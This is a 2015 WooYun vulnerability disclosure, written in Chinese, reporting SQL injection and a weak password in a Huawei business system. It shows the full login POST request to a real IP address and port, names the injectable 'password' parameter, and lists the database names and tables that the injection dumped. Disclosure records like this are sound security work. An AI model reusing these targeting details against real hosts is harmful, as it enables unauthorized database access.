当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134189

漏洞标题:华为某业务系统注入及弱口令

相关厂商:华为技术有限公司

漏洞作者: 路人甲

提交时间:2015-08-14 18:40

修复时间:2015-10-01 10:40

公开时间:2015-10-01 10:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

华为某业务系统注入及弱口令

详细说明:

POST /ZFWH/system/login.action HTTP/1.1
Host: 122.226.178.67:86
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://122.226.178.67:86/ZFWH/system/login.action
Cookie: JSESSIONID=UnZsPNfdT2b6nWuqHQk3iw**.node3
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
logName=cs001&password=aaa&groupId=201309250143&button=%E7%A1%AE%E5%AE%9A


参数password

0.jpg


1.jpg


2.jpg


4.jpg


5.jpg


漏洞证明:

available databases [10]:
[*] BPO
[*] BPOTEST
[*] DBSNMP
[*] GD12345
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
current user: 'BPO'
current schema (equivalent to database on Oracle): 'BPO'
| JBPM30_MODULEDEFINITION |
| JBPM30_MODULEINSTANCE |
| JBPM30_NODE |
| JBPM30_POOLEDACTOR |
| JBPM30_PROCESSDEFINITION |
| JBPM30_PROCESSINSTANCE |
| JBPM30_RUNTIMEACTION |
| JBPM30_SWIMLANE |
| JBPM30_SWIMLANEINSTANCE |
| JBPM30_TASK |
| JBPM30_TASKACTORPOOL |
| JBPM30_TASKCONTROLLER |
| JBPM30_TASKINSTANCE |
| JBPM30_TIMER |
| JBPM30_TOKEN |
| JBPM30_TOKENVARIABLEMAP |
| JBPM30_TRANSITION |
| JBPM30_VARIABLEACCESS |
| JBPM30_VARIABLEINSTANCE |
| JCCBAR_BASIC_CONF |
| KEYWORDS |
| KMS2FILTERS |
| KM_ANNOUNCEMENT |
| KM_AUDIT_COMMENTS |
| KM_AUDIT_CONFIG |
| KM_AUDIT_GROUP |
| KM_FILTER |
| KM_FORBID_TALK |
| KM_FRAGMENT |
| KM_INTEGRATION |
| KM_NOTE |
| KM_RECORD |
| KM_SUMMARY_HINT |
| KM_VIEW_LOG |
| KNOWLEDGE |
| KNOWLEDGE_FILTER |
| KNOWLEDGE_LOAD |
| KNOWLEDGE_MGMT_PARA |
| KNOWLEDGE_STATUS |
| LASTOPERATEID |
| LINK |
| LOAD2LOADED_KNOWLEDGES |
| MAIL_SEND_LIST |
| MARKED_QUES |
| MAS_CONFIG_INFO |
| META_DATA_CATE |
| META_DATA_CATE_2 |
| META_DATA_DEF |
| META_DATA_DEF_2 |
| META_DATA_DEF_CALLLIST |
| META_DATA_DEF_CUSTOMER_2 |
| META_DATA_DEF_ENUM |
| META_DATA_DEF_ENUM_2 |
| MIME_TYPE |
| MMTEMP |
| MM_CONF |
| MM_FAX |
| MM_SMS |
| MODEL2PARAM |
| MODEL_CONF |
| MODEL_PARAM_CONF |
| NGKM_SORT_DIRECTORY |
| NGKM_SORT_TOP_KNOWLEDGE |
| NGKNOWLEDGE |
| NOTE |
| NO_CONFIG |
| OBFAXLIST |
| OBS_POLICY |
| OB_UPLOAD_CONF |
| ORDER_DETAIL |
| ORDER_DETAIL2SIZE |
| ORGAN2GROUP |
| ORGAN_AUTH |
| ORGASTAFF |
| PAGE |
| PIPING_VARIABLE |
| PRDS2SALESCAMPS |
| PRODS2RULES |
| PRODUCT |
| PRODUCT_ORDER |
| PRODUCT_SIZE |
| PRODUCT_TREE |
| PROD_DISC_RULE |
| PXZ_TEMP_0217_1 |
| PXZ_TEMP_0218 |
| PXZ_TEMP_0718_1 |
| PXZ_TEMP_0718_2 |
| PXZ_TEMP_0721 |
| QC_GROUP2ITEMS |
| QC_GROUP_CONF |
| QC_ITEM_CONF |
| QC_RECORD |
| QNAIRES2QUESTIONS |
| QNAIRE_RESULT |
| QNAIRE_STATE |
| QUERY |
| QUES2REL_PAGE |
| QUESTION |
| QUESTIONNAIRE |
| QUESTION_ATTRS |
| QUES_ANSWER |
| QUES_FLOW |
| QUES_VAR |
| QUOTA_CONF |
| QWH20150617 |
| QWH_TEMP_20150212 |
| QWH_TEMP_20150212_2 |
| RECORD_CHANGE |
| RELEVANCE |
| REPORT_CONDITIONS |
| REPORT_FILE_LIST |
| REPORT_MAIN |
| REPORT_TABLE |
| REQ_QUEUE |
| RESP_QUEUE |
| RESULT |
| RIGHT_ANSWERS2RQUES |
| ROOM |
| ROOM_AGENT |
| RPT_QNAIRE_TEMP |
| R_SCM_DEPARTMENT_ROLE |
| R_SCM_ROLE_PRIVILEGE |
| R_SCM_SUBJECT_ROLE |
| SALES_CAMP |
| SCM_AUDIT_LOG |
| SCM_AUDIT_LOG_CODE |
| SCM_LICENSE |
| SCM_LICENSE_EXTEND |
| SCM_LOGIN_MODULE |
| SCM_MGMT_PARA |
| SCM_OBJECT |
| SCM_OPERATE |
| SCM_PRIVILEGE |
| SCM_ROLE |
| SCREEB_CALLTIME_LISTING |
| SCREEB_LINENUM_LISTING |
| SCREEB_ONLINE_LISTING |
| SCREEB_QUEUE_HISTOGRAM |
| SCREEB_TIMELY_CONN |
| SCREEB_TIMELY_CONTE_CALL |
| SCREEB_WORKNUM_LISTING |
| SCREEN_COMPONENT |
| SCREEN_SHOWAREA |
| SEARCH_HITS_STAT |
| SEARCH_LOG |
| SEAT_INFO |
| SIMPLE_KNOWLEDGE |
| SKILL2ACCESSCODE |
| SKILL2AGENT |
| SMS_MO |
| SQLTABLE |
| STAFF |
| STAFF_LIST_ITEM |
| STAFF_MGMT_PARA |
| STAFF_PROFILE |
| SYN_FILE_SERVER_LOG |
| SYN_MAININFO |
| SYS_ACCESSCODE |
| SYS_AGENTSESSION |
| SYS_AGENT_STATUS |
| SYS_AS_STATISTIC |
| SYS_BBS |
| SYS_BUSINESS_ITEM |
| SYS_CODETABLE |
| SYS_CODETABLETIMESTAMP |
| SYS_CUSTOM_MENU |
| SYS_IB_PARA |
| SYS_LIST_ITEM |
| SYS_LOCK |
| SYS_MENU_ENABLE |
| SYS_MGMT_PARA |
| SYS_MODULELOCK |
| SYS_ORGANIZE |
| SYS_ROUTER |
| SYS_SC_AUTHELEMENT |
| SYS_SC_MENU |
| SYS_TENANT |
| SYS_TENANT_CONF |
| SYS_TENANT_CUSTOM |
| SYS_TENANT_SEAT |
| SYS_TENANT_SKILL |
| SYS_TENANT_UAPPHONE |
| S_CODETABLE_COLUMN_DESC |
| TASK |
| TASK2 |
| TASK_COMP_RULE |
| TASK_MNG_CONF |
| TENANT_MGMT_PARA |
| TREE_NODE |
| T_AGT_ANSWER_SITUATION |
| T_AGT_COURSE |
| T_AGT_EXAMPLAN |
| T_AGT_EXAMPLANSTAFF |
| T_AGT_EXAM_SCORE |
| T_AGT_PAPER |
| T_AGT_PAPER2QUESTION |
| T_AGT_PAPERMARK |
| T_AGT_PAPER_TESTITEM |
| T_AGT_RECORD |
| T_AGT_STRATEGY |
| T_AGT_STRATEGY_TESTITEM |
| T_AGT_TESTBYSELF |
| T_AGT_TESTITEM |
| T_AGT_TRAINPLAN |
| T_AGT_TRAINPLANDETAIL |
| T_AGT_TRAINRECORD |
| T_AGT_TRAINSTAFF |
| T_AGT_TYPE |
| T_AG_CENTERPHONENO |
| T_AUDIT_LOG |
| T_AUTHELEMENT |
| T_CF_FORM |
| T_CF_IDEA |
| T_CF_SUBMIT_FORM |
| T_CF_WORKTRAN |
| T_CLEAR_DATA |
| T_CLEAR_MESSAGE |
| T_DEBUG |
| T_FANYA_SATISTY |
| T_GROUPAUTH |
| T_IPCC_QDDC_IVRLOG |
| T_IPCC_WXGL_IVRLOG |
| T_IPCC_XZGH_IVRLOG |
| T_SEQUENCE |
| T_STAFFAUTH |
| USERDEFINED_RELEVANCETYPE |
| VAR_EXPRESSION |
| VDNINFO |
| VIEW_KNOWLEDGE_LOG |
| VOICE_RECORD |
| VOICE_RECORD_ORGANIZE |
| WF_CATEGORY |
| WF_OBJECT_DIRECTORY |
| WF_OBJECT_DIRECTORY_TEMP |
| WIZARD |
| WIZARD_STEP |
| ZF_ACCOUNTABILITY_UNITS_CONF |
| ZF_AUTH_ELEMENT |
| ZF_BIND_CALLNUM |
| ZF_CONDITION_LIST |
| ZF_CONDITION_RELATION |
| ZF_CONDITION_RELATION_QWHBAK |
| ZF_C_AREA |
| ZF_C_BUSI_TYPE1 |
| ZF_C_BUSI_TYPE2 |
| ZF_C_BUSI_TYPE2_QWH |
| ZF_C_DEAL_DPTM |
| ZF_C_DEAL_TYPE |
| ZF_C_DEAL_TYPE1 |
| ZF_C_DEAL_TYPE2 |
| ZF_C_NODE |
| ZF_C_PRIVACY_LEVEL |
| ZF_C_PROPERTY |
| ZF_C_REJECT_TYPE |
| ZF_C_SYS_ERROR |
| ZF_C_TASK_STATUS |
| ZF_C_TEL_ORIGIN |
| ZF_C_TRANS_DEAL_STATUS |
| ZF_C_UNITS |
| ZF_C_UNITS20131023 |
| ZF_C_UPLOAD_PATH |
| ZF_DEAL_UNITS_NAME |
| ZF_EMPLOYEE |
| ZF_LEADERSHIP_REPLY |
| ZF_MANAGER_NAME |
| ZF_ROLE_CONF |
| ZF_R_EMP_UNITS |
| ZF_R_EMP_UNITS_PXZ |
| ZF_R_ROLE_AUTH |
| ZF_R_ROLE_GROUP |
| ZF_SMS_TEMPLATE |
| ZF_UPLOAD_FILE |
| ZF_WF2CHAINHISTORY |
| ZF_WF_CALL_BACK |
| ZF_WF_COMMUNICATION |
| ZF_WF_DELAY_APPLICATION |
| ZF_WF_HISTORY |
| ZF_WF_MAININFO |
| ZF_WF_MAININFOMARK |
| ZF_WF_MAININFO_0718 |
| ZF_WF_MAININFO_BAK |
| ZF_WF_NODE_TIME |
| ZF_WF_REJECT |
| ZF_WF_REPLYINFO |
| ZF_WF_REPLYINFO_0718 |
| ZF_WF_SUPERVISION |
| ZF_WF_SYSLOG |
| ZF_WF_TRANSINFO |
| ZF_WORKDAY |
+------------------------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-08-17 10:40

厂商回复:

多谢白帽子对华为公司IT安全的关注,我们已通知网站管理员尽快整改该漏洞。

最新状态:

暂无